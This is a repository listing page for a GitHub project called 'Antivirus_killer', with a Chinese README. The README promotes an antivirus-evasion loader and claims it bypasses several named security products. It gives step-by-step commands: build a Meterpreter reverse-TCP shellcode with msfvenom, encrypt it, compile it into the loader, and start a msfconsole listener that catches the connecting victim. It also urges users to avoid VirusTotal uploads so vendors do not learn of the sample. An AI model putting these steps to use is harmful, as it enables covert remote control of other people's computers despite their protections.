https://github.com/paokuwansui/Antivirus_killer
免杀主流防病毒软件
https://github.com/paokuwansui/Antivirus_killer
Last synced: 16 days ago
JSON representation
免杀主流防病毒软件
- Host: GitHub
- URL: https://github.com/paokuwansui/Antivirus_killer
- Owner: paokuwansui
- License: mit
- Created: 2024-08-30T10:47:04.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2024-10-17T08:55:16.000Z (about 1 year ago)
- Last Synced: 2024-10-19T11:55:47.722Z (about 1 year ago)
- Language: C
- Size: 54.7 KB
- Stars: 48
- Watchers: 1
- Forks: 5
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - paokuwansui/Antivirus_killer - 免杀主流防病毒软件 (C)
README
# Antivirus_killer
免杀主流防病毒软件
测试于2025年10月22日内存免杀版本_2025_10_22可过最新版火绒、360核晶模式、windows自带杀软、卡巴斯基
微步云沙箱0/24,VT 6/73,麻烦大家少跑VT,VT会给病毒厂商同步报告,且用且珍惜
该项目仅供学术交流参考,请大家合法学习和使用项目
该项目一步一步展示免杀技术和杀毒技术之间的技术演进,希望大家都能有所收获,看不懂的可以扔给AI
# 使用方法
## 生成shellcode
msfvenom LHOST=x.x.x.x LPORT=443 -p windows/x64/meterpreter/reverse_tcp -f c
## 加密shellcode
将生成的shellcode复制到加密器.c的buf变量中并编译运行
## 编译加载器
将加密后的shellcode 复制到加载器的shellcode变量中编译
PS:编译出来的可执行程序名称应该和程序中第7行的防护一至
## 准备msf监听器
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
run
## 双击编译好的exe观察是否上线


